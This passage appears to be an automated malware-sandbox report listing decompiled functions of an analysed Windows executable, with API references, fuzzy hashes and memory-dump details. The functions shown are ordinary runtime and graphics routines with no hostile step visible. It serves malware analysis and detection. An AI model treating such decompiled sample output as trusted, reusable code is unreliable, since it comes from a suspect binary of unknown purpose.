                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction ID: 44c40cd423b67ccf78083ae2a30d6f27b72ddf14c8e4186e4a4d03f68d1a050f
                                                                                • Opcode Fuzzy Hash: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction Fuzzy Hash: FC412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422380, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E00422380(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042221C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
					E004200B4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004200B4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004200B4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E004224F6);
				return E0040274C(_v16);
			}


























                                                                                0x00422381
                                                                                0x00422383
                                                                                0x0042238c
                                                                                0x0042238f
                                                                                0x00422392
                                                                                0x00422396
                                                                                0x004223a8
                                                                                0x004223b2
                                                                                0x004223c2
                                                                                0x004223c2
                                                                                0x004223c7
                                                                                0x004223d3
                                                                                0x004223d6
                                                                                0x004223e4
                                                                                0x004223f2
                                                                                0x004223fc
                                                                                0x00422405
                                                                                0x00422407
                                                                                0x00422407
                                                                                0x00422427
                                                                                0x00422444
                                                                                0x00422447
                                                                                0x00422450
                                                                                0x00422455
                                                                                0x0042245a
                                                                                0x00422470
                                                                                0x00422472
                                                                                0x00422477
                                                                                0x00422479
                                                                                0x00422479
                                                                                0x0042248b
                                                                                0x00422490
                                                                                0x0042249a
                                                                                0x004224a0
                                                                                0x004224a5
                                                                                0x004224ac
                                                                                0x004224c4
                                                                                0x004224c6
                                                                                0x004224cb
                                                                                0x004224cd
                                                                                0x004224cd
                                                                                0x004224d2
                                                                                0x004224d8
                                                                                0x004224db
                                                                                0x004224de
                                                                                0x004224ee

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction ID: 665570bac44c4c60e8fe7534a9a744b194c8e8f5101b8de97ce5c6e0b6c4a068
                                                                                • Opcode Fuzzy Hash: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction Fuzzy Hash: 7F412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004264B4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E004264B4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x487ac0 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A28();
						}
						_t24 = 1;
					}
				} else {
					 *0x487aa4 = E00426184(4, _t23,  *0x487aa4, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                                0x004264bd
                                                                                0x004264c0
                                                                                0x004264ca
                                                                                0x004264ef
                                                                                0x004264f7
                                                                                0x00426517
                                                                                0x0042651c
                                                                                0x00426527
                                                                                0x00426532
                                                                                0x0042653c
                                                                                0x0042653d
                                                                                0x0042653e
                                                                                0x0042653f
                                                                                0x00426540
                                                                                0x00426541
                                                                                0x0042654b
                                                                                0x0042654d
                                                                                0x00426555
                                                                                0x00426556
                                                                                0x00426556
                                                                                0x0042655b
                                                                                0x0042655b
                                                                                0x004264cc
                                                                                0x004264de
                                                                                0x004264eb
                                                                                0x004264eb
                                                                                0x00426565

                                                                                APIs
                                                                                • GetMonitorInfoA.USER32(?,?), ref: 004264E5
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042650C
                                                                                • GetSystemMetrics.USER32 ref: 00426521
                                                                                • GetSystemMetrics.USER32 ref: 0042652C
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 00426556
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfo
                                                                                • API String ID: 1539801207-1633989206
                                                                                • Opcode ID: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction ID: eb29b155447e2ea08417c78262e00809df11af4c5ac13398b32b6bfbf337f6c7
                                                                                • Opcode Fuzzy Hash: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction Fuzzy Hash: 4B1127317003106FD7208F68BC4476BB7E9EF06750F51492EE90997680D374A9808B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042665C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 47%
                                                                                			E0042665C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x487ac2 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A28();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x487aac; // 0x42665c
					 *0x487aac = E00426184(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x487aac(_t27, _t29);
				}
				return _t24;
			}














                                                                                0x00426665
                                                                                0x00426668
                                                                                0x00426672
                                                                                0x00426697
                                                                                0x0042669f
                                                                                0x004266bf
                                                                                0x004266c4
                                                                                0x004266cf
                                                                                0x004266da
                                                                                0x004266e4
                                                                                0x004266e5
                                                                                0x004266e6
                                                                                0x004266e7
                                                                                0x004266e8
                                                                                0x004266e9
                                                                                0x004266f3
                                                                                0x004266f5
                                                                                0x004266fd
                                                                                0x004266fe
                                                                                0x004266fe
                                                                                0x00426703
                                                                                0x00426703
                                                                                0x00426674
                                                                                0x00426679
                                                                                0x00426686
                                                                                0x00426693
                                                                                0x00426693
                                                                                0x0042670d

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004266B4
                                                                                • GetSystemMetrics.USER32 ref: 004266C9
                                                                                • GetSystemMetrics.USER32 ref: 004266D4
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 004266FE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoW$\fB
                                                                                • API String ID: 2545840971-2659345030
                                                                                • Opcode ID: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction ID: e82b1ccf59c43c2d8bf743638305c59c410ee6f05c7b2395847ba50243c0d1fd
                                                                                • Opcode Fuzzy Hash: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction Fuzzy Hash: 581106327043105FE7208FA5BC447ABB7E8EB45714F52483FEC4597680E774A944CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401B3C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E00401B3C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4875bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x487049 != 0) {
						_push(0x4875c4);
						L004013D4();
					}
					 *0x4875bc = 0;
					_t3 =  *0x48761c; // 0x70cc70
					LocalFree(_t3);
					 *0x48761c = 0;
					_t19 =  *0x4875e4; // 0x70c354
					while(_t19 != 0x4875e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040143C(0x4875e4);
					E0040143C(0x4875f4);
					E0040143C(0x487620);
					_t14 =  *0x4875dc; // 0x70bd20
					while(_t14 != 0) {
						 *0x4875dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4875dc; // 0x70bd20
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c19);
					if( *0x487049 != 0) {
						_push(0x4875c4);
						L004013DC();
					}
					_push(0x4875c4);
					L004013E4();
					return 0;
				}
			}










                                                                                0x00401b3d
                                                                                0x00401b47
                                                                                0x00401c1b
                                                                                0x00401b4d
                                                                                0x00401b4f
                                                                                0x00401b50
                                                                                0x00401b55
                                                                                0x00401b58
                                                                                0x00401b62
                                                                                0x00401b64
                                                                                0x00401b69
                                                                                0x00401b69
                                                                                0x00401b6e
                                                                                0x00401b75
                                                                                0x00401b7b
                                                                                0x00401b82
                                                                                0x00401b87
                                                                                0x00401ba1
                                                                                0x00401b9a
                                                                                0x00401b9f
                                                                                0x00401b9f
                                                                                0x00401bae
                                                                                0x00401bb8
                                                                                0x00401bc2
                                                                                0x00401bc7
                                                                                0x00401bce
                                                                                0x00401bd2
                                                                                0x00401bd9
                                                                                0x00401bde
                                                                                0x00401be3
                                                                                0x00401be9
                                                                                0x00401bec
                                                                                0x00401bef
                                                                                0x00401bfb
                                                                                0x00401bfd
                                                                                0x00401c02
                                                                                0x00401c02
                                                                                0x00401c07
                                                                                0x00401c0c
                                                                                0x00401c11
                                                                                0x00401c11

                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,00000000,1!), ref: 00401B69
                                                                                • LocalFree.KERNEL32(0070CC70,00000000,1!), ref: 00401B7B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0070CC70,00000000,1!), ref: 00401B9A
                                                                                • LocalFree.KERNEL32(0070BD20,?,00000000,00008000,0070CC70,00000000,1!), ref: 00401BD9
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401C19,0070CC70,00000000,1!), ref: 00401C02
                                                                                • RtlDeleteCriticalSection.KERNEL32(004875C4,00401C19,0070CC70,00000000,1!), ref: 00401C0C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: 1!
                                                                                • API String ID: 3782394904-1845855088
                                                                                • Opcode ID: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction ID: caa9c97ba3000af0647512c36d6f90ab019626e33afd24c9466f0402b3c2e7e1
                                                                                • Opcode Fuzzy Hash: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction Fuzzy Hash: DF115E7464C6406EE711BB66ECB2B2E7A959745708F60887FF500B6AF2D67CD840CB2C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004041A4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E004041A4(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x487048 == 0) {
					if( *0x46b01c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x48721c == 0xd7b2 &&  *0x487224 > 0) {
						 *0x487234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E0040422C, 2,  &_v4, 0);
				}
			}





                                                                                0x004041ac
                                                                                0x0040420c
                                                                                0x0040421c
                                                                                0x0040421c
                                                                                0x00404222
                                                                                0x004041ae
                                                                                0x004041b7
                                                                                0x004041c7
                                                                                0x004041c7
                                                                                0x004041e3
                                                                                0x00404204
                                                                                0x00404204

                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883,?,00000000), ref: 004041DD
                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883), ref: 004041E3
                                                                                • GetStdHandle.KERNEL32(000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041F8
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041FE
                                                                                • MessageBoxA.USER32 ref: 0040421C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$Message
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1570097196-2970929446
                                                                                • Opcode ID: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction ID: 3cda8e2fd8faf604d14361e06e5260565932c3c5a82abd22b22224aa19730b8a
                                                                                • Opcode Fuzzy Hash: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction Fuzzy Hash: 55F0C2B169434035E62063A46D06F5E26488385B59F204EFFB320F80E293BC98C4476E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00442D8C, Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 39%
                                                                                			E00442D8C(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00442554(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00423960(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E00424D78(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041F338( *((intOrPtr*)(E00423F28( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00412984(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00423F28( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041F9D0(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E0041FDC4(E00423F28( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00442728(_t118));
						L004260DC();
						E00412984(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E0041FDC4(E00423F28( *((intOrPtr*)(_t118 + 0x54))));
						E0041F338( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
						_t136 = E0041FDC4(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406A30();
						E0041F338( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
						_t137 = E0041FDC4(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406A30();
						return _t96;
					}
					_push(_a8);
					_push(E00442350(_t142));
					E00442D64(_t118, _t142);
					_push(E00442350(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E0041FDC4(__ecx));
					_push(_v8);
					_t117 = E00442728(_t118);
					_push(_t117);
					L004260DC();
					return _t117;
				}
				return _t46;
			}




















                                                                                0x00442d8c
                                                                                0x00442d95
                                                                                0x00442d97
                                                                                0x00442d9a
                                                                                0x00442d9e
                                                                                0x00442da5
                                                                                0x00442dab
                                                                                0x00442daf
                                                                                0x00442df5
                                                                                0x00442df9
                                                                                0x00442e07
                                                                                0x00442e09
                                                                                0x00442e10
                                                                                0x00442e1c
                                                                                0x00442e24
                                                                                0x00442e26
                                                                                0x00442e26
                                                                                0x00442e39
                                                                                0x00442e4d
                                                                                0x00442e55
                                                                                0x00442e59
                                                                                0x00442e5e
                                                                                0x00442e5f
                                                                                0x00442e64
                                                                                0x00442e66
                                                                                0x00442e68
                                                                                0x00442e6a
                                                                                0x00442e6c
                                                                                0x00442e6e
                                                                                0x00442e70
                                                                                0x00442e7f
                                                                                0x00442e83
                                                                                0x00442e8b
                                                                                0x00442e8c
                                                                                0x00442ea8
                                                                                0x00442eba
                                                                                0x00442ec5
                                                                                0x00442ed1
                                                                                0x00442ed9
                                                                                0x00442ee1
                                                                                0x00442ee6
                                                                                0x00442eeb
                                                                                0x00442eed
                                                                                0x00442ef2
                                                                                0x00442ef6
                                                                                0x00442efa
                                                                                0x00442eff
                                                                                0x00442f03
                                                                                0x00442f03
                                                                                0x00442f04
                                                                                0x00442f05
                                                                                0x00442f06
                                                                                0x00442f13
                                                                                0x00442f1f
                                                                                0x00442f27
                                                                                0x00442f2f
                                                                                0x00442f34
                                                                                0x00442f39
                                                                                0x00442f3b
                                                                                0x00442f40
                                                                                0x00442f44
                                                                                0x00442f48
                                                                                0x00442f4c
                                                                                0x00442f4d
                                                                                0x00442f50
                                                                                0x00442f51
                                                                                0x00442f52
                                                                                0x00000000
                                                                                0x00442f52
                                                                                0x00442db4
                                                                                0x00442dbd
                                                                                0x00442dc0
                                                                                0x00442dca
                                                                                0x00442dcb
                                                                                0x00442dcd
                                                                                0x00442dd2
                                                                                0x00442dd6
                                                                                0x00442dde
                                                                                0x00442de2
                                                                                0x00442de5
                                                                                0x00442dea
                                                                                0x00442deb
                                                                                0x00000000
                                                                                0x00442deb
                                                                                0x00442f5d

                                                                                APIs
                                                                                • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442DEB
                                                                                • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442E8C
                                                                                • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442ED9
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 00442EE1
                                                                                • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00442F06
                                                                                  • Part of subcall function 00442D64: 73452240.COMCTL32(00000000,?,00442DC5,00000000,?), ref: 00442D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: 73452430Color$73452240E897Text
                                                                                • String ID:
                                                                                • API String ID: 3108427945-0
